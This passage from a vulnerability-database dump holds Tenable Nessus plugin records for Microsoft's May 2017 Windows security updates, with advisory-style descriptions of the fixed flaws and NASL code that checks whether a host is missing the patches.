DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019215/windows-8-update-kb4019215\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09cc032f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019213 or Cumulative update KB4019215.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019213', # 8.1 / 2012 R2 Security Only\n '4019215' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019213, 4019215]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:10:50", "description": "The remote Windows host is missing security update 4019214 or cumulative update 4019216. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows Server 2012 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0238", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17-MAY_4019214.NASL", "href": "https://www.tenable.com/plugins/nessus/100054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100054);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0238\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98102,\n 98103,\n 98111,\n 98127,\n 98139,\n 98237,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019214\");\n script_xref(name:\"MSKB\", value:\"4019216\");\n script_xref(name:\"MSFT\", value:\"MS17-4019214\");\n script_xref(name:\"MSFT\", value:\"MS17-4019216\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows Server 2012 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019214\nor cumulative update 4019216. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019214/windows-server-2012-update-kb4019214\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ae1f0e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019214 or Cumulative update KB4019216.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019214', # 2012 Monthly Rollup\n '4019216' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019214,4019216]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:04", "description": "The remote Windows 10 version 1507 host is missing security update KB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a 